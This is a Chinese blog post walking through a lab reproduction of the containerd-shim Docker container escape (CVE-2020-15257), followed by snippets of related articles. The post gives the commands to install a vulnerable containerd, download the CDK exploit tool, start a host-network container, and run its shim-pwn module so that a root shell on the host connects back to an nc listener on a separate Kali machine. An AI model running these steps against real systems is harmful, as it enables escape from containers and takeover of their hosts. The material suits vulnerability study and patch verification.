docker逃逸漏洞(CVE-2020-15257)

最新推荐文章于 2025-04-03 16:14:40 发布
最新推荐文章于 2025-04-03 16:14:40 发布
阅读量7.4k 收藏 5
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_36197704/article/details/122172877
版权

1.漏洞描述

        containerd是行业标准的容器运行时,可作为Linux和Windows的守护程序使用。在版本1.3.9和1.4.3之前的容器中,容器填充的API不正确地暴露给主机网络容器。填充程序的API套接字的访问控制验证了连接过程的有效UID为0,但没有以其他方式限制对抽象Unix域套接字的访问。这将允许在与填充程序相同的网络名称空间中运行的恶意容器(有效UID为0,但特权降低)导致新进程以提升的特权运行。

2.漏洞原理

        当在docker使用–net=host参数启动,与宿主机共享net namespace时,容器中的攻击者可以绕过访问权限访问 containerd 的控制API 进而导致权限提升。

3.影响版本

containerd < 1.4.3

containerd < 1.3.9

4.POC

下载地址:https://github.com/Xyntax/CDK/releases/tag/0.1.6

5.环境准备

Kali

192.168.42.138

Ubuntu

192.168.42.145

安装docker版本:18.06.1-ce

安装runc版本:1.0.0-rc5

安装containerd版本:1.2.0

6.漏洞复现

列出可用的containerd

apt-cache madison containerd

选择一个版本来安装

sudo apt-get install containerd=1.2.6-0ubuntu1~16.04.4

查看containerd版本

ctr version

下载POC

wget https://github.com/cdk-team/CDK/releases/download/0.1.6/cdk_v0.1.6_release.tar.gz

查看系统信息,显示本系统为ubuntu 16.04版本

通过--net=host 作为启动参数来运行一个容器

docker run -it --net=host ubuntu:16.04 /bin/bash

在容器内执行如下命令,可看到抽象命名空间Unix域套接字

cat /proc/net/unix|grep -a "containerd-shim"

PS生成的前12个字符为容器CONTAINER ID号

将解压cdk_linux_amd64文件拷贝到容器tmp文件夹下

Kali开启nc监听

nc –lvp 1919

在容器中执行exp,自动搜索可用的socket并反弹宿主机的shell到远端服务器,完成逃逸

./cdk_linux_amd64 run shim-pwn 192.168.42.138 1919

7.修复建议

升级containerd至最新版本。

Docker 容器逃逸漏洞 (CVE-2020-15257)
12-26 2万+
漏洞简述: 当在docker使用–net=host参数启动,与宿主机共享net namespace时,容器中的攻击者可以绕过访问权限访问 containerd 的控制API 进而导致权限提升。 漏洞利用: (1)安装有漏洞containerd版本,影响版本containerd< 1.3.9&&containerd < 1.4.3 #列出仓库中可用的版本,安...
Docker容器逃逸漏洞-CVE-2024-21626
墨痕诉清风的博客
07-23 713
Snyk 在 Docker 引擎以及其他容器化技术(例如 Kubernetes)使用的 runc <=1.1.11 的所有版本中发现了一个漏洞。利用此问题可能会导致容器逃逸到底层主机操作系统,无论是通过执行恶意映像还是使用恶意 Dockerfile 或上游映像构建映像(即使用时FROM)
Docker 容器逃逸漏洞 (CVE-2020-15257)复现
玄道的网安博客
12-27 1423
漏洞概述 containerd是行业标准的容器运行时,可作为Linux和Windows的守护程序使用。在版本1.3.9和1.4.3之前的容器中,容器填充的API不正确地暴露给主机网络容器。填充程序的API套接字的访问控制验证了连接过程的有效UID为0,但没有以其他方式限制对抽象Unix域套接字的访问。这将允许在与填充程序相同的网络名称空间中运行的恶意容器(有效UID为0,但特权降低)导致新进程以提升的特权运行。 影响版本 containerd < 1.4.3 containe...
Docker逃逸总结,从零基础到精通,收藏这篇就够了!
最新发布
Javachichi的博客
04-03 1226
在版本1.3.9之前和1.4.0~1.4.2的Containerd中,由于在网络模式为host的情况下,容器与宿主机共享一套Network namespace ,此时containerd-shim API暴露给了用户,而且访问控制仅仅验证了连接进程的有效UID为0,但没有限制对抽象Unix域套接字的访问,刚好在默认情况下,容器内部的进程是以root用户启动的。Docker 监护进程有一个特性,它能被允许访问 root 用户或者是在 docker 组里面的所有用户,这就如同拥有 root 的访问权限。
docker逃逸漏洞CVE-2019-5736)
热门推荐
chaojixiaojingang
12-23 1万+
1.漏洞描述 2019年2月11日,runC的维护团队报告了一个新发现的漏洞,SUSE Linux GmbH高级软件工程师Aleksa Sarai公布了影响Docker, containerd, Podman, CRI-O等默认运行时容器runc的严重漏洞CVE-2019-5736。漏洞会对IT运行环境带来威胁,漏洞利用会触发容器逃逸、影响整个容器主机的安全,最终导致运行在该主机上的其他容器被入侵。漏洞影响AWS, Google Cloud等主流云平台。日前,该容器逃逸漏洞的PoC利用代码已在...
Docker逃逸漏洞浅讲
qq_73630656的博客
10-08 1594
篡改了系统的 runc 文件,在其中加入恶意代码,在下一次 run exec (启动命令行)的时候导致恶意代码执行
Docker 逃逸 漏洞复现
Jack_chao_的博客
03-27 1542
CVE-2020-15257-host模式容器逃逸漏洞分析
docker逃逸复现(CVE-2020-15257-host模式容器逃逸漏洞
m0_63306943的博客
02-28 1541
因为docker所使用的是隔离技术,就导致了容器内的进程无法看到外面的进程,但外面的进程可以看到里面,所以如果一个 Docker 容器内部可以操作该容器的外部资源,一般理解为操作宿主机的行为。叫做docker逃逸。host模式这种模式下,容器和主机已经没有网络隔离了,它们共享同一个网络命名空间,容器的网络配置和主机完全一样,使用主机的IP地址和端口,可以查看到主机所有网卡信息、网络资源,在网络性能上没有损耗。但也正是因为没有网络隔离,容器和主机容易产生网络资源冲突、争抢,以及其他的一些问题。
容器逃逸漏洞 Docker containerd-shim(CVE-2020-15257)复现与分析
SHELLCODE_8BIT的博客
04-08 3346
1.环境搭建 使用metarget搭建 git clone https://github.com/brant-ruan/metarget.git cd metarget/ pip3 install -r requirements.txt 2.安装靶场 ./metarget cnv install cve-2019-5736
docker逃逸漏洞总结
weixin_35756130的博客
02-13 287
Docker 逃逸漏洞主要有两种:第一种是由于容器中的应用程序的设计错误而导致的;第二种是由于容器的安全设置不当而导致的。为了避免这两种漏洞,建议在部署容器时,应该采用一些安全的措施,如控制容器的访问权限、限制容器的网络通信等。 ...
Docker 容器逃逸漏洞(CVE-2020-15257)复现
qq_44657899的博客
10-03 5053
文章目录环境准备(安装docker)漏洞复现 环境准备(安装docker) 这里我使用的新安装的ubuntu安装一个docker复现漏洞,然后用同网段的kali接收shell 首先给ubuntu换源(换过了就不用换了) vim /etc/apt/sources.list #添加源 #中科大源 deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb-src http://mirrors.ustc.edu.cn/k
docker容器_Docker 容器逃逸漏洞
weixin_35207054的博客
12-27 267
2020年12月1日,阿里云应急响应中心监测到 containerd 官方发布安全更新,修复了 Docker 容器逃逸漏洞(CVE-2020-15257)漏洞描述Containerd 是一个控制 runC 的守护进程,提供命令行客户端和 API,用于在一个机器上管理容器。在特定网络条件下,攻击者可通过访问containerd-shim API,从而实现Docker容器逃逸。阿里云应急响...
Linux本地内核提权漏洞复现(CVE-2019-13272)
m0_48520508的博客
01-19 874
0x00简介 在5.1.17之前的Linux内核中,kernel / ptrace.c中的ptrace_link错误地处理了想要创建ptrace关系的进程的凭据记录,这允许本地用户通过利用父子的某些方案来获取root访问权限 进程关系,父进程删除权限并调用execve可能允许攻击者控制。 0x01漏洞概述 Linux执行PTRACE_TRACEME函数时,ptrace_link函数将获得对父进程凭据的RCU引用,然后将该指针指向get_cred函数,但是,对象struct cred的生存周期规则不允许无条.
docker逃逸漏洞复现
风雨来花满楼的博客
07-20 541
如何判断是否在docker工作环境下 docker环境下:ls -alh /.dockerenv , 非docker环境,没有这个.dockerenv文件的(定制化比较高的docker系统也可能没有这个文件) 查询系统进程的cgroup信息 cat /proc/1/cgroup CVE-2020-15257 容器逃逸漏洞利用 CVE-2020-15257的利用条件——net namespace(–net=host)与宿主机共享 以以下命令运行容器 docker run --rm --net=
CVE-2020-15257: containerd 虚拟环境逃逸漏洞通告
爱国小白帽
12-01 1840
报告编号:B6-2020-120101 报告来源:360CERT 报告作者:360CERT 更新日期:2020-12-01 0x01 漏洞简述 2020年12月01日,360CERT监测发现 containerd 发布了 containerd 权限提升漏洞 的风险通告,该漏洞编号为 CVE-2020-15257漏洞等级:中危 ,漏洞评分:6.1 。 containerd 修复了一处容器权限逃逸漏洞,该漏洞的本质是满足特定条件的容器可以绕过访问权限访问 containerd 的控制API 进而导.
【云原生渗透】- docker runc容器逃逸漏洞(CVE-2019-5736)
神棍之路
01-11 1465
运行时存在安全漏洞,攻击者可以通过特定的容器镜像或者exec操作,来获取到宿主机的runc执行时的文件句柄,并修改掉runc的二进制文件,从而可以在宿主机上以root身份执行命令。containerd 向下通过 containerd-shim 结合 runC,使得引擎可以独立升级,避免之前 Docker Daemon 升级会导致所有容器不可用的问题。将该payload拷贝到docker容器中(这就是模拟攻击者获取了docker容器权限,在容器中上传payload进行docker逃逸
Docker-CVE-2020-15257
Karka_的博客
08-14 240
在Linux系统中存在着一种unix域套接字,其作用是为了进程间通信,其使用方法类似于普通的socket套接字,只不过使用socket函数的时候域设置为AF_UNIX,同时套接字的类型分为:流套接字(SOCK_STREAM)和数据报套接字(SOCK_DGRAM)。结构体的第二个字段就是文件路径,它也分为两种:1. 普通的文件路径:它是一个合法的Linux文件路径,当不需要这个套接字的时候需要删除文件。
漏洞复现】Docker runC 容器逃逸漏洞(CVE-2019-5736)
李火火的安全圈
12-09 5752
2019年2月11日,runC的维护团队报告了一个新发现的漏洞,SUSE Linux GmbH高级软件工程师Aleksa Sarai公布了影响Docker, containerd, Podman, CRI-O等默认运行时容器runc的严重漏洞CVE-2019-5736。漏洞会对IT运行环境带来威胁,漏洞利用会触发容器逃逸、影响整个容器主机的安全,最终导致运行在该主机上的其他容器被入侵。漏洞影响AWS, Google Cloud等主流云平台。日前,该容器逃逸漏洞的PoC利用代码已在GitHub上公布。
美食高德地图 微信小程序代码
06-13
美食高德地图微信小程序是一款结合了地图服务和本地生活信息的应用,它整合了高德地图的精确导航功能,帮助用户在微信小程序中搜索周边的餐厅、美食店、小吃等,提供详细的地址、营业时间、用户评价等信息,方便用户随时随地找到美食去处。 在微信小程序的代码层面,美食高德地图可能会使用微信小程序提供的API,如`wx.geolocation`获取用户位置,`wx.request`发送网络请求获取美食数据,以及`wx.openLocation`引导用户导航。开发者需要了解微信小程序的开发框架,如WXML(描述页面结构)、WXSS(编写样式)、JS(处理逻辑)以及数据管理(可能使用小程序的数据缓存和云数据库)。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值